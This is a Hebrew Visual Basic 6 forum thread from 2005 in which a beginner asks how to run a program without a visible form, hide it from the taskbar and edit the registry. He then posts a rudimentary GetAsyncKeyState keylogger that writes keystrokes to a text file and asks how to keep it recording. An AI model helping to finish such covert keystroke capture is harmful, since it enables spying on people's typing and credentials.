כותב |
|
איתמר משתמש פעיל
הצטרף / הצטרפה: 17 November 2005 מדינה: Israel
משתמש: מנותק/ת הודעות: 73
|
נשלח בתאריך: 29 November 2005 בשעה 22:30 | | IP רשוּם
|
|
|
|
1 כיצד אפשר לעשות שטופס יופיע רק פעם אחת? 2 האם אפשר לבנות תוכנה בויזואל בייסק בלי טופס וכיצד עושים זאת אם זה אפשרי? 3 וכן כיצד עושים כשאין טופס להעלים משורת המשימות והתוכנה תגיב לכל התהליכים כמו קובץ EXE { שיגרת Form_Load ו KeyPress }? 4 איזה קוד צריך לכתוב בשגרת Form Load בכדי שכל התוכניות יסגרו בהפעלת התוכנה { כמו צירוף מקשים של ALT ו F4? 5 כיצד אפשר דרך ויזואל בייסיק להוסיף ערכים לרג'יסטרי? 6 קצת לא קשור לתיכנות בויזואל בייסיק אבל גם שאלה שמטרידה אותי כיצד אפשר אם בכלל להגיע/ למחוק/ לשנות / ליצור ערכים חדשים ברג'יסטרי דרך דוס הכוונה לפני ש WINDOWS עולה (אם בכלל זה שייך) 7 כיצד אפשר ואם בכלל זה אפשרי לעשות שהאיקס של סגירת התוכנית יהיה בצד שמאל? 8 איזה קוד צריך לכתוב בשגרת Form Load בכדי שכל התוכניות יסגרו בהפעלת התוכנה? 9 האם אפשר להגדיר כל מיני הגדרות לכפתורים ופקדים שונים דרך מודל (כגון caption מיקום הכפתור על הטופס וכו')?
סליחה על כל השאלות
__________________ כל העולם כולו גשר צר מאד
|
חזרה לתחילת העמוד |
|
|
y2cRAck4 אחראי פורומים
הצטרף / הצטרפה: 28 July 2005 מדינה: Israel
משתמש: מנותק/ת הודעות: 437
|
נשלח בתאריך: 30 November 2005 בשעה 07:52 | | IP רשוּם
|
|
|
|
אחי, אין בעיה לענות לך על כל השאלות
אבל חיפוש קצר בגוגל יעלה את כולם
__________________ ? Why to crack for
|
חזרה לתחילת העמוד |
|
|
ShadowBeast אחראי פורומים
הצטרף / הצטרפה: 22 January 2005 מדינה: Israel
משתמש: מנותק/ת הודעות: 1073
|
נשלח בתאריך: 30 November 2005 בשעה 08:07 | | IP רשוּם
|
|
|
|
איתמר כתב:
1 כיצד אפשר לעשות שטופס יופיע רק פעם אחת? 2 האם אפשר לבנות תוכנה בויזואל בייסק בלי טופס וכיצד עושים זאת אם זה אפשרי? 3 וכן כיצד עושים כשאין טופס להעלים משורת המשימות והתוכנה תגיב לכל התהליכים כמו קובץ EXE { שיגרת Form_Load ו KeyPress }? 4 איזה קוד צריך לכתוב בשגרת Form Load בכדי שכל התוכניות יסגרו בהפעלת התוכנה { כמו צירוף מקשים של ALT ו F4? 5 כיצד אפשר דרך ויזואל בייסיק להוסיף ערכים לרג'יסטרי? 6 קצת לא קשור לתיכנות בויזואל בייסיק אבל גם שאלה שמטרידה אותי כיצד אפשר אם בכלל להגיע/ למחוק/ לשנות / ליצור ערכים חדשים ברג'יסטרי דרך דוס הכוונה לפני ש WINDOWS עולה (אם בכלל זה שייך) 7 כיצד אפשר ואם בכלל זה אפשרי לעשות שהאיקס של סגירת התוכנית יהיה בצד שמאל? 8 איזה קוד צריך לכתוב בשגרת Form Load בכדי שכל התוכניות יסגרו בהפעלת התוכנה? 9 האם אפשר להגדיר כל מיני הגדרות לכפתורים ופקדים שונים דרך מודל (כגון caption מיקום הכפתור על הטופס וכו')?
סליחה על כל השאלות |
|
|
אני לא יודע VB, אבל אני אענה לך על 2...(שיבוא כל אחד יענה לו על אחת ואז ככה בסוף הוא יקבל תשובות להכל)
2. תעשה לו opticity של 0
__________________ The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
חזרה לתחילת העמוד |
|
|
y2cRAck4 אחראי פורומים
|
נשלח בתאריך: 30 November 2005 בשעה 09:19 | | IP רשוּם
|
|
|
|
חברים, אני חושב שאתם לא מבינים, הוא לא מדבר על VB .NET (או שאני טועה?!)
2. והשיטה לעשות את זה היא למחוק את כל הטפסים, וליצור Module, לאחר מכן בתוך ה- Module תכתוב שגרה ()Sub Main, וכל מה שבתוכה יתבצע מיד לאחר הרצת התוכנית ללא כל טפסים.
כל השאר. גוגל
נ.ב. הכי מומלץ זה לקנות ספר
|
חזרה לתחילת העמוד |
|
|
איתמר משתמש פעיל
|
נשלח בתאריך: 30 November 2005 בשעה 22:34 | | IP רשוּם
|
|
|
|
אחי קודם כל אתה צודק אני לא משתמש בויזואל בייסיק NET
דבר שני יש לי ספר של ויזואל בייסיק של הוד עמי אבל שם זה לא עונה על השאלות שאני צריך
ולסיום סליחה שאני שואל את השאלות כאן אבל אני לא מוצא בגוגל את התשובות
|
חזרה לתחילת העמוד |
|
|
y2cRAck4 אחראי פורומים
|
נשלח בתאריך: 01 December 2005 בשעה 13:34 | | IP רשוּם
|
|
|
|
אתה בטוח?! אני אקח באופן רנדומלי שאלה ונחפש עליה מידע בגוגל ונראה אם יש תשובה או לא. בסדר?
"5. כיצד אפשר דרך ויזואל בייסיק להוסיף ערכים לרג'יסטרי?"
כדי להיות מומחה בקשר לשאלה זו, נבצע שתי שאילתות פשוטות.
1. http://www.google.co.il/search?hl=iw&q=Registry+Visual+B asic&meta
2. http://www.google.co.il/search?hl=iw&q=Registry+Reading+ Writing+Visual+Basic&meta
אפשר גם את זאת: http://www.google.co.il/search?hl=iw&q=Registry+Reading+ Writing+MSDN+Visual+Basic&meta
האמת כולן היו אותו דבר אבל רק כדי למצוא את כל המידע. אוקיי, אז מה אנחנו מוצאים? את זה: http://msdn.microsoft.com/...
את זה: http://www.windowsdevcenter.com/pub/a/windows/2004/07/27/VB_ Registry_Values.html
ועוד מלא...
וזהו, הם נותנים מלא קודים וכבר את השאלה הזאת אפשר להוריד מהרשימה.
|
חזרה לתחילת העמוד |
|
|
איתמר משתמש פעיל
|
נשלח בתאריך: 01 December 2005 בשעה 22:30 | | IP רשוּם
|
|
|
|
נסיתי את מה שאמרת להכניס בתוך מודל את השיגרה ()Sub Main אבל אחרי לחיצה על הפעלת התוכנה היא מסתיימת מיד אחרי ההפעלה כמו כן כתבתי את כל קוד התוכנית בתוך לולאה משום שאני רוצה שהתוכנית תבדוק כל הזמן אבל אחרי שמתבצעת פקודת IF אחת מתוך הקוד הוא מעתיק לתוך קובץ הTXT את האות המון פעמים לכן הבאתי כאן את כל הקוד כדי שתוכלו להסביר כיצד אני עושה שהתוכנה תבדוק כל הזמן ( עד שאני ינתק את התוכנה ) איזה אות ותכתוב לתוך קובץ הTXT את האות שהוקשה ולאחר מכן תמשיך לבדוק ושוב תכתוב לתוך קובץ הTXT וכן הלאה וכן הלאה Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Sub Main() Open "C:\txtLog.TXT" For Output As #1 If GetAsyncKeyState(vbKeyA) Then Print #1, "A" If GetAsyncKeyState(vbKeyB) Then Print #1, "B" If GetAsyncKeyState(vbKeyC) Then Print #1, "C" If GetAsyncKeyState(vbKeyD) Then Print #1, "D" If GetAsyncKeyState(vbKeyE) Then Print #1, "E" End Sub נ.ב. אם באפשרותך/כם להוסיף את התשובה על הקוד עצמו זה יעזור הרבה מאוד תודה מראש איתמר { או כיצד כותבים לולאה אין סופית }
תראה את ההודעה הפרטית ששלחתי לך
תודה מראש
|
חזרה לתחילת העמוד |
|
|
y2cRAck4 אחראי פורומים
|
נשלח בתאריך: 01 December 2005 בשעה 22:49 | | IP רשוּם
|
|
|
|
אוקיי, התוכנית מסתיימת כי אין לה עוד מה לבצע!
לולאה אין סופית:
זה יגרום למחשב (לתוכנית) להיתקע.
|
חזרה לתחילת העמוד |
|
|
איתמר משתמש פעיל
|
נשלח בתאריך: 03 December 2005 בשעה 23:00 | | IP רשוּם
|
|
|
|
אה הבנתי
אז אם כן כיצד אני עושה שהתוכנה תמתין להקשה מצד המשתמש וכל הזמן( אני מדגיש וכל הזמן ) תהיה בדיקה והעתקה לתוך קובץ הTXT עד שאני ינתק את התוכנה אגב בדקתי את מה שכתבת לגבי לולאה אין סופית וגם זה מיד כשאני לוחץ על הפעלה הוא מיד מסתיים מה שכן קראתי בספר שיש לי ( הוצאת הוד עמי ) שאפשר לעשות לולאה אין סופית אם מאפסים את ערך הפתיחה בתוך הלולאה עצמה לדוגמה For I = 1 To 10 I = 0 Next I
וזה בדוק ומנוסה שהמחשב נתקע
|
חזרה לתחילת העמוד |
|
|
y2cRAck4 אחראי פורומים
|
נשלח בתאריך: 03 December 2005 בשעה 23:02 | | IP רשוּם
|
|
|
|
תיקנתי את הקוד :)
קוד:
Do While NOT 1=2 MsgBox("פחחח ההודעה הזאת תופיע אין-סוף פעמים!!!") Loop |
|
|
גם זה בדוק ומנוסה...תראה מה ההיגיון שלך אומר לך :-)
|
חזרה לתחילת העמוד |
|
|
איתמר משתמש פעיל
|
נשלח בתאריך: 05 December 2005 בשעה 22:40 | | IP רשוּם
|
|
|
|
מה לגבי זה יש לך תשובה
איתמר כתב:
אה הבנתי
אז אם כן כיצד אני עושה שהתוכנה תמתין להקשה מצד המשתמש וכל הזמן( אני מדגיש וכל הזמן ) תהיה בדיקה והעתקה לתוך קובץ הTXT עד שאני ינתק את התוכנה
|
|
|
|
חזרה לתחילת העמוד |
|
|
איתמר משתמש פעיל
|
נשלח בתאריך: 09 December 2005 בשעה 13:58 | | IP רשוּם